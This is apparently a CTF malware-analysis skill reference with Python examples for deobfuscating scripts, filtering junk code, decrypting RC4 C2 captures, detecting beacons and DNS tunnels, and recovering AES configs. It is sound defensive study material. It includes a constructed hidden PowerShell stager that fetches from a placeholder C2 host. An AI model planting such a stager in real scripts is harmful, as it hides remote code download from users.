ctf-malware
npx machina-cli add skill ljagiello/ctf-skills/ctf-malware --openclaw
CTF Malware & Network Analysis
Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code.
Additional Resources
- scripts-and-obfuscation.md - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis
- c2-and-protocols.md - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery
- pe-and-dotnet.md - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor
Obfuscated Scripts
- Replace `eval`/`bash` with `echo` to print the underlying code; extract base64/hex blobs and analyze them with `file`. See scripts-and-obfuscation.md.
JavaScript & PowerShell Deobfuscation
- JS: Replace `eval` with `console.log`; decode `unescape()`, `atob()`, `String.fromCharCode()`.
- PowerShell: Decode `-enc` base64, replace `IEX` with output. See scripts-and-obfuscation.md.
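Added example (not code from the ctf-skills project): a static layer-peeler that does the "replace eval/IEX with a print" step without executing anything. It decodes PowerShell `-enc` (base64 of UTF-16LE text), JavaScript `String.fromCharCode(...)` and `unescape('%..')`, and generic base64/hex blobs, one layer at a time. The three-layer stager it runs on is constructed in the block; the host name is a placeholder.

```python
"""Peel nested encoding layers out of an obfuscated script without running it.

Added example, not code from the ctf-skills project. Decoders cover the
layers the quick reference names: PowerShell -enc (base64 of UTF-16LE),
JavaScript String.fromCharCode(...) and unescape('%..'), generic base64 and
hex blobs. Decoding instead of evaluating is the safe form of
"replace eval/IEX with a print".
"""
import base64
import binascii
import re
from typing import List, Optional
from urllib.parse import unquote

_PS_ENC_RE = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
_UNESCAPE_RE = re.compile(r"unescape\(['\"]((?:%[0-9a-fA-F]{2})+)['\"]\)")
_B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
_HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}){8,}")


def _looks_like_text(data: bytes) -> bool:
    """Accept a decode only if it yields printable text, so ordinary words that
    happen to be valid base64 (e.g. 'FromBase64String') are skipped."""
    return bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel_once(text: str) -> Optional[str]:
    """Decode exactly one layer; None when no known encoding is present."""
    m = _PS_ENC_RE.search(text)
    if m:  # powershell -enc <base64 of UTF-16LE script>
        try:
            return base64.b64decode(m.group(1)).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            pass
    m = _FROMCHARCODE_RE.search(text)
    if m:  # String.fromCharCode(104,116,...) -> literal string, in place
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        return text[: m.start()] + "".join(map(chr, codes)) + text[m.end():]
    m = _UNESCAPE_RE.search(text)
    if m:  # unescape('%68%74...') -> literal string, in place
        return text[: m.start()] + unquote(m.group(1)) + text[m.end():]
    for m in _B64_RE.finditer(text):  # atob(...), FromBase64String(...)
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue
        if _looks_like_text(raw):
            return text[: m.start()] + raw.decode("ascii") + text[m.end():]
    for m in _HEX_RE.finditer(text):  # long hex string payloads
        raw = bytes.fromhex(m.group(0))
        if _looks_like_text(raw):
            return text[: m.start()] + raw.decode("ascii") + text[m.end():]
    return None


def peel_all(text: str, max_layers: int = 10) -> List[str]:
    """All layers, outermost first, until no decoder applies."""
    layers = [text]
    for _ in range(max_layers):
        nxt = peel_once(layers[-1])
        if nxt is None or nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


# Constructed sample: a three-layer PowerShell stager built here so the
# example runs offline (the host name is a placeholder, not a real IOC).
_STAGE2 = "$c2 = 'http://c2.example.invalid/gate'; Invoke-WebRequest $c2"
_STAGE1 = ("IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
           + base64.b64encode(_STAGE2.encode()).decode() + "')))")
SAMPLE = ("powershell -nop -w hidden -enc "
          + base64.b64encode(_STAGE1.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for depth, layer in enumerate(peel_all(SAMPLE)):
        print(f"--- layer {depth} ---\n{layer}")
```

`peel_all(SAMPLE)` returns three layers: the `-enc` command line, the `IEX`/`FromBase64String` stage, and that stage with its blob replaced by the plaintext script, at which point no decoder applies and the loop stops.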
Junk Code Detection
- NOP sleds, push/pop pairs, dead writes, unconditional jumps to the next instruction. Filter these out to extract the real `call` targets. See scripts-and-obfuscation.md.
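Added example (not code from the ctf-skills project): a filter for the four junk patterns above over a plain `address: mnemonic operands` listing, returning the surviving `call` targets. The listing is constructed to mimic objdump-style output; the dead-write check is a one-instruction lookahead and ignores flag side effects.

```python
"""Strip junk instructions from a disassembly listing and keep the real call
targets.

Added example, not code from the ctf-skills project. Input is a plain
'address: mnemonic operands' listing (the constructed sample mimics
objdump/capstone output); the junk patterns are the ones the quick
reference lists.
"""
import re
from typing import List, Set, Tuple

Instr = Tuple[int, str, str]  # (address, mnemonic, operands)
_LINE_RE = re.compile(r"^\s*([0-9a-fA-F]+):\s+(\w+)\s*(.*?)\s*$")
# Instructions that overwrite their first operand (old value irrelevant)
_WRITES_DEST = {"mov", "lea", "movzx", "movsx", "xor"}

# Constructed listing: two real calls buried in padding.
LISTING = """\
00401000: push eax
00401001: pop eax
00401002: nop
00401003: jmp 0x401005
00401005: mov ebx, 1
00401008: nop
00401009: call 0x402000
0040100e: push ecx
0040100f: pop ecx
00401010: xor edx, edx
00401012: mov edx, 5
00401017: call 0x402100
0040101c: ret
"""


def parse_listing(text: str) -> List[Instr]:
    out: List[Instr] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if m:
            out.append((int(m.group(1), 16), m.group(2).lower(), m.group(3)))
    return out


def _operands(ops: str) -> List[str]:
    return [p.strip() for p in ops.split(",")] if ops else []


def junk_indices(instrs: List[Instr]) -> Set[int]:
    junk: Set[int] = set()
    for i, (_, mnem, ops) in enumerate(instrs):
        nxt = instrs[i + 1] if i + 1 < len(instrs) else None
        if mnem == "nop":
            junk.add(i)                                   # NOP sled
        elif mnem == "push" and nxt and nxt[1] == "pop" and nxt[2] == ops:
            junk.update((i, i + 1))                       # push X / pop X
        elif mnem == "jmp" and nxt and ops.startswith("0x") and int(ops, 16) == nxt[0]:
            junk.add(i)                                   # jmp to next instruction
        elif mnem in _WRITES_DEST and nxt and nxt[1] in _WRITES_DEST:
            dst = _operands(ops)[0]
            nops = _operands(nxt[2])
            # dead write: the next instruction overwrites the same register
            # without reading it first (xor edx,edx ; mov edx,5). Flags set
            # by xor are ignored here, so check for a following jcc by hand.
            if nops and nops[0] == dst and all(dst not in s for s in nops[1:]):
                junk.add(i)
    return junk


def clean_listing(text: str) -> List[Instr]:
    instrs = parse_listing(text)
    junk = junk_indices(instrs)
    return [ins for i, ins in enumerate(instrs) if i not in junk]


def real_call_targets(text: str) -> List[int]:
    """Direct call targets that survive the junk filter."""
    return [int(ops, 16) for _, mnem, ops in clean_listing(text)
            if mnem == "call" and ops.startswith("0x")]


if __name__ == "__main__":
    for addr, mnem, ops in clean_listing(LISTING):
        print(f"{addr:08x}: {mnem} {ops}")
    print("calls:", [hex(t) for t in real_call_targets(LISTING)])
```

On the sample, 8 of 13 instructions are dropped and the two `call` targets remain; indirect calls (`call eax`, `call [mem]`) are not resolved and would need the register value from context.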
PCAP & Network Analysis
tshark -r file.pcap -Y "tcp.stream eq X" -T fields -e tcp.payload
Look for C2 on unusual ports. Extract IPs/domains with strings | grep. See c2-and-protocols.md.
Custom Crypto Protocols
- Stream ciphers share keystream state for both directions; concatenate ALL payloads chronologically.
- ChaCha20 keystream extraction: send null bytes (0 XOR anything = anything). See c2-and-protocols.md.
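Added example (not code from the ctf-skills project) for the two points above: one stream-cipher state shared by both directions, so the capture must be decrypted as one chronological byte string, and keystream recovery from known plaintext (null bytes give the keystream directly). RC4 stands in for the cipher because it fits inline; its sequential S-box init is also the RC4 fingerprint listed under "Identifying Encryption Algorithms" and the routine applies to the RC4 WebSocket C2 case once the key is recovered from the binary. Key and messages are constructed.

```python
"""Decrypting a C2 capture where one stream-cipher state serves both directions.

Added example, not code from the ctf-skills project. RC4 is used because it
is short enough to write inline; the same bookkeeping applies to ChaCha20 or
any other keystream cipher. Key and messages are constructed.
"""
from itertools import islice
from typing import Iterator, List, Tuple


def rc4_keystream(key: bytes) -> Iterator[int]:
    """RC4 KSA + PRGA. The sequential S-box init (S[i] = i, then key-driven
    swaps) is the pattern the quick reference lists for spotting RC4."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class SharedStream:
    """One keystream consumed by every message, whichever side sent it."""

    def __init__(self, key: bytes) -> None:
        self._ks = rc4_keystream(key)

    def apply(self, data: bytes) -> bytes:
        return xor_bytes(data, bytes(islice(self._ks, len(data))))


Message = Tuple[str, bytes]  # (direction, payload)
KEY = b"ctf-demo-key"  # constructed
PLAINTEXT: List[Message] = [
    ("c2s", b"HELLO id=7 os=linux"),
    ("s2c", b"CMD sleep 60"),
    ("c2s", b"ACK"),
    ("s2c", b"CMD whoami"),
]


def build_capture(key: bytes = KEY) -> List[Message]:
    """Simulate implant and server sharing a single RC4 state."""
    stream = SharedStream(key)
    return [(d, stream.apply(p)) for d, p in PLAINTEXT]


def decrypt_capture(key: bytes, capture: List[Message]) -> List[Message]:
    """Concatenate ALL ciphertexts chronologically, XOR with one keystream,
    then split at the original message boundaries."""
    joined = b"".join(c for _, c in capture)
    plain = xor_bytes(joined, bytes(islice(rc4_keystream(key), len(joined))))
    out, pos = [], 0
    for direction, c in capture:
        out.append((direction, plain[pos:pos + len(c)]))
        pos += len(c)
    return out


def decrypt_one_direction(key: bytes, capture: List[Message], direction: str) -> bytes:
    """The tempting shortcut: decrypt one side only. Wrong after the first
    message, because the other side's traffic also advanced the keystream."""
    stream = SharedStream(key)
    return b"".join(stream.apply(c) for d, c in capture if d == direction)


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """C XOR P = keystream. A message of null bytes hands over the keystream
    directly (0 XOR k = k), the trick the notes describe for ChaCha20."""
    return xor_bytes(ciphertext, known_plaintext)


if __name__ == "__main__":
    cap = build_capture()
    for d, p in decrypt_capture(KEY, cap):
        print(d, p)
```

`decrypt_capture` is the correct path; `decrypt_one_direction` is kept to show why the server-only reconstruction yields garbage from the second message on. For ChaCha20 substitute a keystream generator with the recovered key and nonce; the concatenation and split logic is unchanged.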
C2 Traffic Patterns
- Beaconing, DGA, DNS tunneling, HTTP(S) with custom headers, encoded payloads. See c2-and-protocols.md.
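Added example (not code from the ctf-skills project): two of the patterns above as detection logic over records you would pull from a PCAP with tshark, beacon periodicity from flow timestamps (low coefficient of variation of inter-arrival gaps) and DNS-tunnelling-style query names (long, high-entropy subdomains). The flows and queries are constructed with documentation addresses and `.invalid` domains; the thresholds are starting points, not tuned values.

```python
"""Two cheap C2 heuristics: beacon periodicity and DNS-tunnel-style names.

Added example, not code from the ctf-skills project. Records are constructed
(RFC 5737 addresses, .invalid domains); thresholds are starting points.
"""
import math
import statistics
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

Flow = Tuple[float, str, str, int]  # (timestamp_s, src, dst, dst_port)

# Constructed: host 10.0.0.7 checks in every ~60 s on 8443, and also talks
# to an unrelated server at irregular, human-looking times.
FLOWS: List[Flow] = [
    (0.0, "10.0.0.7", "203.0.113.10", 8443),
    (61.0, "10.0.0.7", "203.0.113.10", 8443),
    (119.0, "10.0.0.7", "203.0.113.10", 8443),
    (181.0, "10.0.0.7", "203.0.113.10", 8443),
    (240.0, "10.0.0.7", "203.0.113.10", 8443),
    (300.0, "10.0.0.7", "203.0.113.10", 8443),
    (5.0, "10.0.0.7", "198.51.100.5", 443),
    (7.0, "10.0.0.7", "198.51.100.5", 443),
    (30.0, "10.0.0.7", "198.51.100.5", 443),
    (31.0, "10.0.0.7", "198.51.100.5", 443),
    (90.0, "10.0.0.7", "198.51.100.5", 443),
    (200.0, "10.0.0.7", "198.51.100.5", 443),
]

# Constructed query names (e.g. from `tshark -T fields -e dns.qry.name`)
QUERIES = [
    "www.example.com",
    "cdn-assets.static.example.com",
    "mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpja.t.example.invalid",
]


def beacon_candidates(flows: List[Flow], min_count: int = 5, max_cv: float = 0.15):
    """Group by (src, dst, port); flag series whose inter-arrival gaps have a
    low coefficient of variation (std/mean). Jittered beacons still score
    low; interactive traffic does not."""
    by_pair: Dict[Tuple[str, str, int], List[float]] = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)
    hits = []
    for pair, times in by_pair.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits.append((pair, round(mean, 1), round(cv, 3)))
    return hits


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def tunnel_candidates(queries: List[str], min_len: int = 25, min_entropy: float = 3.0):
    """Long, high-entropy labels under one parent domain are the classic
    DNS-tunnel signal. Assumes a two-label registered domain (no public
    suffix list), so co.uk-style names need a longer tail."""
    hits = []
    for q in queries:
        labels = q.rstrip(".").split(".")
        sub = ".".join(labels[:-2])
        if len(sub) >= min_len and shannon_entropy(sub) >= min_entropy:
            hits.append((q, round(shannon_entropy(sub), 2)))
    return hits


if __name__ == "__main__":
    print("beacons:", beacon_candidates(FLOWS))
    print("dns tunnels:", tunnel_candidates(QUERIES))
```

The 8443 series has gaps of 61, 58, 62, 59 and 60 s (mean 60, CV about 0.02) and is flagged; the 443 series has gaps from 1 to 110 s and is not. Only the 43-character encoded subdomain trips the DNS check.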
RC4-Encrypted WebSocket C2
- Remap port with `tcprewrite`, add RSA key for TLS decryption, find RC4 key in binary. See c2-and-protocols.md.
Identifying Encryption Algorithms
- AES: `0x637c777b` S-box; ChaCha20: `expand 32-byte k`; TEA/XTEA: `0x9E3779B9`; RC4: sequential S-box init. See c2-and-protocols.md.
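Added example (not code from the ctf-skills project): a byte-pattern scanner for the constants above, plus the AES inverse S-box prefix. The TEA delta is searched in both byte orders because it shows up as an immediate; the RC4 entry only catches a statically stored identity table, since the usual loop-built S-box has to be recognised in the disassembly. The sample blob is constructed.

```python
"""Spot crypto algorithms in a binary by their fixed constants.

Added example, not code from the ctf-skills project. Signatures are the ones
the quick reference lists (AES S-box, ChaCha20 'expand 32-byte k', TEA/XTEA
delta, RC4 sequential S-box) plus the AES inverse S-box; the sample blob is
constructed.
"""
import struct
from typing import Dict, List

SIGNATURES: Dict[str, List[bytes]] = {
    # First eight entries of the AES forward and inverse S-boxes
    "AES S-box": [bytes.fromhex("637c777bf26b6fc5")],
    "AES inverse S-box": [bytes.fromhex("52096ad53036a538")],
    # Salsa20/ChaCha20 'sigma' (256-bit key) and 'tau' (128-bit key)
    "ChaCha20/Salsa20 constant": [b"expand 32-byte k", b"expand 16-byte k"],
    # TEA/XTEA delta as a little- or big-endian immediate. Note this golden
    # ratio constant is also a common hash-mixing value, so confirm in code.
    "TEA/XTEA delta": [struct.pack("<I", 0x9E3779B9), struct.pack(">I", 0x9E3779B9)],
    # RC4: only an unrolled/static identity table is caught here; the usual
    # for-loop init (S[i] = i) has to be recognised in the disassembly.
    "RC4 identity S-box table": [bytes(range(256))],
}


def scan_constants(blob: bytes) -> Dict[str, List[int]]:
    """Map signature name -> sorted list of byte offsets where it occurs."""
    hits: Dict[str, List[int]] = {}
    for name, patterns in SIGNATURES.items():
        for pat in patterns:
            off = blob.find(pat)
            while off != -1:
                hits.setdefault(name, []).append(off)
                off = blob.find(pat, off + 1)
    for offs in hits.values():
        offs.sort()
    return hits


def scan_file(path: str) -> Dict[str, List[int]]:
    with open(path, "rb") as fh:
        return scan_constants(fh.read())


# Constructed blob: AES S-box at 16, ChaCha20 sigma at 28, TEA delta at 51
SAMPLE_BLOB = (
    bytes(16)
    + bytes.fromhex("637c777bf26b6fc5")
    + b"JUNK"
    + b"expand 32-byte k"
    + b"\x90" * 7
    + struct.pack("<I", 0x9E3779B9)
)

if __name__ == "__main__":
    for name, offs in scan_constants(SAMPLE_BLOB).items():
        print(f"{name}: {[hex(o) for o in offs]}")
```

Offsets are into the raw file; convert them to RVAs with the section table before cross-referencing in a disassembler.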
AES-CBC in Malware
- Key = MD5/SHA256 of hardcoded string; IV = first 16 bytes of ciphertext. See c2-and-protocols.md.
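Added example (not code from the ctf-skills project) of the layout described above: key derived by hashing a hardcoded string, IV taken from the first 16 bytes of the blob, PKCS7 padding removed after CBC decryption. It assumes the `cryptography` package for the AES part (the key and IV helpers run without it); the secret string and config are constructed placeholders. One caveat worth a flag in the code: some families pass the hex digest string rather than the raw digest, so an MD5 "key" may really be 32 ASCII bytes and AES-256.

```python
"""Recover an AES-CBC-encrypted malware config: key = hash(hardcoded string),
IV = first 16 bytes of the blob.

Added example, not code from the ctf-skills project. Needs the `cryptography`
package for AES (key/IV helpers work without it); secret and config are
constructed placeholders.
"""
import hashlib
from typing import Optional, Tuple

try:
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    AES_AVAILABLE = True
except ImportError:  # derive_key/split_iv still usable
    AES_AVAILABLE = False

SECRET = "hardcoded-string-from-sample"  # constructed placeholder
CONFIG = b'{"c2": "c2.example.invalid:4444", "sleep": 60}'  # constructed


def derive_key(secret: str, algo: str = "md5", as_hex: bool = False) -> bytes:
    """md5 -> 16 bytes (AES-128), sha256 -> 32 bytes (AES-256).
    as_hex=True feeds the hex digest string instead (md5 hex = 32 bytes =
    AES-256; sha256 hex = 64 bytes, which AES rejects). Try both when the
    first attempt unpads to garbage."""
    h = hashlib.new(algo, secret.encode())
    return h.hexdigest().encode() if as_hex else h.digest()


def split_iv(blob: bytes) -> Tuple[bytes, bytes]:
    """IV is the first 16 bytes; the rest is ciphertext."""
    return blob[:16], blob[16:]


def decrypt_config(blob: bytes, secret: str, algo: str = "md5",
                   as_hex: bool = False) -> bytes:
    iv, ct = split_iv(blob)
    if len(ct) % 16:
        raise ValueError("ciphertext length is not a multiple of the AES block")
    key = derive_key(secret, algo, as_hex)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def encrypt_config(plaintext: bytes, secret: str, algo: str = "md5",
                   as_hex: bool = False, iv: bytes = bytes(16)) -> bytes:
    """Only here to build a blob in the same layout (IV || ciphertext)."""
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext) + pad.finalize()
    key = derive_key(secret, algo, as_hex)
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return iv + enc.update(padded) + enc.finalize()


def demo(algo: str = "sha256", as_hex: bool = False) -> Optional[bytes]:
    """Round-trip a constructed blob; None if `cryptography` is missing."""
    if not AES_AVAILABLE:
        return None
    iv = bytes.fromhex("000102030405060708090a0b0c0d0e0f")  # constructed
    blob = encrypt_config(CONFIG, SECRET, algo, as_hex, iv=iv)
    return decrypt_config(blob, SECRET, algo, as_hex)


if __name__ == "__main__":
    print(demo() or "cryptography package not installed")
```

A wrong key or hash choice normally surfaces as a PKCS7 unpadding error or non-JSON output rather than an exception from the cipher itself, so iterate over `(algo, as_hex)` combinations and check the plaintext looks like a config.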
PE Analysis
peframe malware.exe # Quick triage
pe-sieve # Runtime analysis
pestudio # Static analysis (Windows)
See pe-and-dotnet.md.
.NET Malware Analysis
- Use dnSpy/ILSpy for decompilation; AsmResolver for programmatic analysis. LimeRAT C2: AES-256-ECB with MD5-derived key. See pe-and-dotnet.md.
Malware Configuration Extraction
- Check .data section, PE/.NET resources, registry keys, encrypted config files. See pe-and-dotnet.md.
Sandbox Evasion Checks
- VM detection, debugger detection, timing checks, environment checks, analysis tool detection. See pe-and-dotnet.md.
PyInstaller + PyArmor Unpacking
- Use `pyinstxtractor.py` to extract, PyArmor-Unpacker for protected code. See pe-and-dotnet.md.
Telegram Bot Evidence Recovery
- Use bot token from malware source to call the `getUpdates` and `getFile` APIs. See c2-and-protocols.md.
Debian Package Analysis
ar -x package.deb && tar -xf control.tar.xz # Check postinst scripts
See scripts-and-obfuscation.md.
Network Indicators Quick Reference
strings malware | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
tshark -r capture.pcap -Y "dns.qry.name" -T fields -e dns.qry.name | sort -u
Source
git clone https://github.com/ljagiello/ctf-skills/blob/main/ctf-malware/SKILL.md
Overview
This skill provides rapid techniques for malware analysis and network traffic investigation in CTF challenges. It covers obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, and PE/.NET binaries, with a focus on extracting malware configurations and indicators of compromise.
How This Skill Works
It organizes practical workflows across key categories (obfuscated scripts, network traffic, crypto protocols, and PE/.NET analysis) and maps them to concrete tools and commands. You’ll perform deobfuscation, PCAP/C2 pattern analysis, crypto payload extraction, and static/dynamic analysis using tools like tshark, peframe, pe-sieve, pestudio, dnSpy, AsmResolver, LimeRAT extraction utilities, and PyInstaller/PyArmor unpackers to recover configurations and IOCs.
When to Use It
- When you encounter obfuscated JavaScript or PowerShell payloads in a CTF
- When analyzing a malicious package or installer for hidden payloads and C2 behavior
- When you need to reverse or reconstruct a custom crypto protocol or RC4/AES C2 channel
- When tracing C2 traffic in PCAPs to identify beaconing patterns and IOCs
- When triaging PE/.NET malware and extracting embedded configurations or indicators
Quick Start
- Step 1: Identify artifact type (JS/PowerShell, PE/.NET, PCAP, or package) and run quick triage with the recommended tools (peframe/pe-sieve/pestudio for PE, tshark for PCAP, and basic strings).
- Step 2: Perform deobfuscation and payload extraction following guidance in scripts-and-obfuscation.md (replace eval with echo, decode base64, extract base64/hex blobs).
- Step 3: Analyze C2 patterns and crypto usage; extract configurations and IOCs, then document findings for reporting.
Best Practices
- Deobfuscate first: replace eval/base64-like tricks and decode payloads to reveal the underlying code
- Use category-specific tools (PCAP analysis with tshark, PE/.NET tooling for binaries, deobfuscation pipelines)
- Focus on C2 patterns and encryption: beacon behavior, custom headers, and key recovery
- Extract malware configurations from data sections, resources, the registry, and encrypted files
- Document IOCs clearly and validate findings with repeatable, safe sandbox checks
Example Use Cases
- Obfuscated JavaScript in a CTF payload decoded by replacing eval and decoding base64 to reveal a hidden beacon
- Malicious installer analyzed; C2 traffic observed on a non-standard port with RC4-encrypted payloads
- PCAP analysis uncovers RC4 WebSocket C2; recovered RC4 key from binary and reconstructed traffic
- PE sample triaged with peframe/pe-sieve/pestudio reveals embedded configuration and sandbox evasion checks
- .NET malware sample decompiled with dnSpy/AsmResolver; LimeRAT-like AES-256-ECB config recovered